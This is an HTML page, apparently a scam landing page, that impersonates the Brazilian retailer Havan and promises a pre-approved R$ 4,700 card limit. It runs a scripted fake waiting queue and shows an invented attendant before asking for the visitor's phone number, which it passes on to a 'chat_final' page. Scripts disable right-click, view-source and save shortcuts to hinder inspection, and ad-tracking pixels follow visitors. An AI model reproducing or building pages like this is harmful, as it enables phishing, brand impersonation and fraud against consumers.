<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <!-- Meta Pixel Code -->
    <script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '679a0347b036c59c818c7236');
    fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=679a0347b036c59c818c7236&ev=PageView&noscript=1"
    /></noscript>
    <!-- End Meta Pixel Code -->

    <script src="js/latest.js" data-utmify-prevent-subids async defer></script>

    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    <meta charset="UTF-8">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Desbloqueio do Cartão - Havan</title>
    <style>
        body {
            background-color: #f9f9f9;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        .header {
            background: rgb(255, 255, 255);
            color: white;
            padding: 15px 0;
            text-align: center;
        }

        .header img {
            width: 120px;
        }

        .main-container {
            max-width: 600px;
            margin: 20px auto;
            background-color: white;
            border-radius: 10px;
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
            overflow: hidden;
        }

        /* Ajustes para mobile */
        @media (max-width: 768px) {
            .main-container {
                margin: 10px;
                border-radius: 10px;
            }
        }

        .video-container {
            width: 100%;
            background-color: #000;
            display: flex;
            align-items: center;
            justify-content: center;
            position: relative;
            overflow: hidden;
        }

        /* Estilo base para o player vturb */
        .video-container vturb-smartplayer {
            width: 100% !important;
            display: block !important;
        }

        /* Desktop - proporção 16:9 perfeita */
        @media (min-width: 769px) {
            .video-container {
                aspect-ratio: 16/9; /* Mantém proporção 16:9 */
                max-height: 400px;
            }
            
            .video-container vturb-smartplayer {
                height: 100% !important;
            }
        }

        /* Tablet - ajuste intermediário */
        @media (max-width: 768px) and (min-width: 481px) {
            .video-container {
                margin: 0 -15px; /* Expande para as bordas */
                aspect-ratio: 16/9;
                max-height: 350px;
            }
            
            .video-container vturb-smartplayer {
                width: calc(100vw - 30px) !important; /* Compensa as margens */
                height: 100% !important;
            }
        }

        /* Mobile - otimização para telas pequenas */
        @media (max-width: 480px) {
            .main-container {
                margin: 10px 0 !important; /* Remove margens laterais */
                border-radius: 0 !important; /* Remove bordas arredondadas */
            }
            
            .video-container {
                margin: 0 !important;
                width: 100vw !important; /* Usa toda a largura da tela */
                height: 56.25vw !important; /* 16:9 baseado na largura da tela */
                max-height: 300px;
                min-height: 200px;
                position: relative;
                left: 50%;
                transform: translateX(-50%); /* Centraliza perfeitamente */
            }
            
            .video-container vturb-smartplayer {
                width: 100% !important;
                height: 100% !important;
                position: absolute !important;
                top: 0 !important;
                left: 0 !important;
            }
            
            /* Força o iframe interno a preencher sem bordas */
            .video-container vturb-smartplayer iframe,
            .video-container vturb-smartplayer video {
                width: 100% !important;
                height: 100% !important;
                object-fit: cover !important;
                border: none !important;
            }
        }

        /* Mobile muito pequeno - ajuste adicional */
        @media (max-width: 360px) {
            .video-container {
                height: 50vw !important;
                max-height: 250px !important;
                min-height: 180px !important;
            }
        }

        .video-placeholder {
            text-align: center;
            padding: 20px;
        }

        .limit-section {
            background: linear-gradient(135deg, #002279, #0066cc);
            color: white;
            text-align: center;
            padding: 20px;
            font-size: 24px;
            font-weight: bold;
        }

        .content-section {
            padding: 30px;
            text-align: center;
        }

        .queue-loading {
            display: block;
            margin-bottom: 30px;
        }

        .queue-text {
            font-size: 18px;
            color: #002279;
            margin-bottom: 20px;
        }

        .loading-bar {
            width: 100%;
            height: 8px;
            background-color: #e0e0e0;
            border-radius: 4px;
            overflow: hidden;
            margin-bottom: 15px;
        }

        .loading-progress {
            height: 100%;
            background: linear-gradient(90deg, #002279, #0066cc);
            width: 0%;
            border-radius: 4px;
            animation: loading 30s linear forwards;
        }

        @keyframes loading {
            0% { width: 0%; }
            100% { width: 100%; }
        }

        .queue-counter {
            font-size: 14px;
            color: #666;
        }

        .attendant-section {
            display: none;
            margin-bottom: 30px;
        }

        .attendant-title {
            font-size: 18px;
            color: #002279;
            margin-bottom: 15px;
        }

        .attendant-name {
            font-size: 22px;
            font-weight: bold;
            color: #002279;
            margin-bottom: 20px;
        }

        .attendant-photo {
            width: 120px;
            height: 120px;
            border-radius: 50%;
            margin: 0 auto 20px;
            overflow: hidden;
            border: 4px solid #002279;
        }

        .attendant-photo img {
            width: 100%;
            height: 100%;
            object-fit: cover;
        }

        .phone-section {
            display: none;
            margin-bottom: 30px;
        }

        .phone-label {
            font-size: 16px;
            color: #333;
            margin-bottom: 10px;
            text-align: left;
        }

        .phone-input {
            width: 100%;
            padding: 15px;
            border: 2px solid #ddd;
            border-radius: 8px;
            font-size: 16px;
            outline: none;
            transition: border-color 0.3s ease;
        }

        .phone-input:focus {
            border-color: #002279;
        }

        .unlock-button {
            display: none;
            background-color: #002279;
            color: white;
            font-weight: bold;
            border: none;
            padding: 15px 40px;
            border-radius: 8px;
            font-size: 18px;
            cursor: pointer;
            transition: background-color 0.3s ease;
            width: 100%;
        }

        .unlock-button:hover {
            background-color: #001a5c;
        }

        .unlock-button:disabled {
            background-color: #ccc;
            cursor: not-allowed;
        }

        .footer {
            background: #ffffff;
            border-top: 1px solid #e6e6e6;
            text-align: center;
            padding: 15px;
            font-size: 10px;
            color: #666;
        }

        .styles_company__HQYS3 {
            display: flex;
            flex-direction: column;
            justify-content: center;
            text-align: center;
            gap: 24px;
            padding: 24px 16px 32px;
        }

        .styles_company__HQYS3 p {
            font-size: .75rem;
            line-height: 16px;
            letter-spacing: 0;
        }

        @media (max-width: 768px) {
            .main-container {
                margin: 10px;
                border-radius: 0;
            }
            
            .video-container {
                height: 250px;
            }
            
            .limit-section {
                font-size: 20px;
                padding: 15px;
            }
            
            .content-section {
                padding: 20px;
            }
        }
    </style>
    <script>
        if (document.addEventListener) {
            document.addEventListener("keydown", bloquearSource);
        } else {
            document.attachEvent("onkeydown", bloquearSource);
        }

        function bloquearSource(e) {
            e = e || window.event;
            var code = e.which || e.keyCode;
            if (e.ctrlKey && (code == 83 || code == 85)) {
                if (e.preventDefault) {
                    e.preventDefault();
                } else {
                    e.returnValue = false;
                }
                return false;
            }
        }
    </script>
    <style>
        body {
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }

        input, textarea {
            -webkit-touch-callout: initial;
            -webkit-user-select: text;
            -khtml-user-select: text;
            -moz-user-select: text;
            -ms-user-select: text;
            user-select: text;
        }

        [contenteditable=true] {
            -webkit-touch-callout: initial;
            -webkit-user-select: all;
            -khtml-user-select: all;
            -moz-user-select: all;
            -ms-user-select: all;
            user-select: all;
        }
    </style>
    <script>
        if (document.addEventListener) {
            document.addEventListener("contextmenu", function (e) {
                e.preventDefault();
                return false;
            });
        } else {
            document.attachEvent("oncontextmenu", function (e) {
                e = e || window.event;
                e.returnValue = false;
                return false;
            });
        }
    </script>

    <script>
        !function(e,t){"object" == typeof exports && "object" == typeof module ? module.exports = t() : "function" == typeof define && define.amd ? define([], t) : "object" == typeof exports ? exports.install = t() : e.install = t()}(window,(function(){return function(e){var t={ };function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{ }};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e, t) || Object.defineProperty(e, t, { enumerable: !0, get: o })},n.r=function(e){"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 })},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e, n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject = n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t] = function () { for (var n = [], r = 0; r < arguments.length; r++)n[r] = arguments[r]; var i = o([t], n, !0); e.push(i) }};i.methods.forEach((function(e){a(i, e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n, e)})),n},i.load=function(e,o){var a="../s1.kwai.net/kos/s101/nlav11187/pixel/events.html";i._i=i._i||{ },i._i[e]=[],i._i[e]._u=a,i._t=i._t||{ },i._t[e]=+new Date,i._o=i._o||{ },i._o[e]=o||{ };var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"../s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.html"+c)}}(window,document,"kwaiq")}])}));
    </script>
    <script>
        kwaiq.load('510449167530721283');
        kwaiq.page();
    </script>

    <script>
        !function(e,t){"object" == typeof exports && "object" == typeof module ? module.exports = t() : "function" == typeof define && define.amd ? define([], t) : "object" == typeof exports ? exports.install = t() : e.install = t()}(window,(function(){return function(e){var t={ };function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{ }};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e, t) || Object.defineProperty(e, t, { enumerable: !0, get: o })},n.r=function(e){"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 })},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e, n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject = n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t] = function () { for (var n = [], r = 0; r < arguments.length; r++)n[r] = arguments[r]; var i = o([t], n, !0); e.push(i) }};i.methods.forEach((function(e){a(i, e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n, e)})),n},i.load=function(e,o){var a="../s1.kwai.net/kos/s101/nlav11187/pixel/events.html";i._i=i._i||{ },i._i[e]=[],i._i[e]._u=a,i._t=i._t||{ },i._t[e]=+new Date,i._o=i._o||{ },i._o[e]=o||{ };var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"../s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.html"+c)}}(window,document,"kwaiq")}])}));
    </script>
    <script>
        kwaiq.load('261106540113615');
        kwaiq.page();
    </script>
</head>

<body>
    <div class="header">
        <img src="assets/havan.png" alt="Logo">
    </div>

    <div class="main-container">
        <!-- Área do Vídeo -->
        <div class="video-container" id="videoContainer">
            <vturb-smartplayer id="vid-6894e34a94176522ab1aae58" style="display: block; margin: 0 auto; width: 100%;"></vturb-smartplayer>
            <script type="text/javascript">
                var s=document.createElement("script");
                s.src="https://scripts.converteai.net/ffd2c220-884c-4c80-a1d0-47d95bac0513/players/6894e34a94176522ab1aae58/v4/player.js";
                s.async=!0;
                document.head.appendChild(s);
            </script>
        </div>

        <!-- Seção do Limite -->
        <div class="limit-section">
            Limite de R$ 4.700 reais liberados!
        </div>

        <!-- Conteúdo Principal -->
        <div class="content-section">
            <!-- Loading da Fila -->
            <div class="queue-loading" id="queueLoading">
                <div class="queue-text">Você está na fila de espera para ser atendido por um de nossos atendentes</div>
                <div class="loading-bar">
                    <div class="loading-progress"></div>
                </div>
                <div class="queue-counter" id="queueCounter">Aguarde... Tempo estimado: 30 segundos</div>
            </div>

            <!-- Seção da Atendente -->
            <div class="attendant-section" id="attendantSection">
                <div class="attendant-title">Você será atendido(a) por:</div>
                <div class="attendant-name">Juliana Silva</div>
                <div class="attendant-photo">
                    <img src="juliana_silva.jpg" alt="Juliana Silva">
                </div>
            </div>

            <!-- Seção do Telefone -->
            <div class="phone-section" id="phoneSection">
                <div class="phone-label">Digite seu número de telefone:</div>
                <input type="tel" class="phone-input" id="phoneInput" placeholder="(11) 99999-9999" maxlength="15">
            </div>

            <!-- Botão de Desbloqueio -->
            <button class="unlock-button" id="unlockButton" onclick="redirectToChat()">DESBLOQUEAR CARTÃO</button>
        </div>
    </div>

    <!-- Footer -->
    <div class="styles_company__HQYS3">
        <div>
            <p class="styles_description__590uc">HAVAN S.A. | CNPJ: 79.379.491.0008-50 | Rod. Antônio Heil, 250 - Centro II, Brusque - SC, 88353-100</p>
            <p class="styles_description__590uc">© 2025 - Todos os direitos reservados</p>
        </div>
    </div>

    <script>
        let timeLeft = 30;
        
        // Atualiza o contador de tempo
        function updateCounter() {
            const counter = document.getElementById('queueCounter');
            if (timeLeft > 0) {
                counter.textContent = `Aguarde... Tempo estimado: ${timeLeft} segundos`;
                timeLeft--;
                setTimeout(updateCounter, 1000);
            } else {
                counter.textContent = 'Conectando...';
            }
        }

        // Inicia o contador
        updateCounter();

        // Após 30 segundos, mostra a seção da atendente
        setTimeout(function() {
            document.getElementById('queueLoading').style.display = 'none';
            document.getElementById('attendantSection').style.display = 'block';
            document.getElementById('phoneSection').style.display = 'block';
            document.getElementById('unlockButton').style.display = 'block';
        }, 30000);

        // Máscara para o telefone
        document.getElementById('phoneInput').addEventListener('input', function(e) {
            let value = e.target.value.replace(/\D/g, '');
            if (value.length >= 11) {
                value = value.replace(/(\d{2})(\d{5})(\d{4})/, '($1) $2-$3');
            } else if (value.length >= 7) {
                value = value.replace(/(\d{2})(\d{4})(\d{0,4})/, '($1) $2-$3');
            } else if (value.length >= 3) {
                value = value.replace(/(\d{2})(\d{0,5})/, '($1) $2');
            } else if (value.length >= 1) {
                value = value.replace(/(\d{0,2})/, '($1');
            }
            e.target.value = value;
            
            // Habilita/desabilita o botão baseado no preenchimento
            const button = document.getElementById('unlockButton');
            if (value.length >= 14) { // (11) 99999-9999
                button.disabled = false;
            } else {
                button.disabled = true;
            }
        });

        function redirectToChat() {
            const phone = document.getElementById('phoneInput').value;
            if (phone.length >= 14) {
                // Mantém os parâmetros UTM na URL
                const urlParams = new URLSearchParams(window.location.search);
                urlParams.set('phone', encodeURIComponent(phone));
                window.location.href = 'chat_final.html?' + urlParams.toString();
            } else {
                alert('Por favor, digite um número de telefone válido.');
            }
        }
    </script>
</body>
</html>

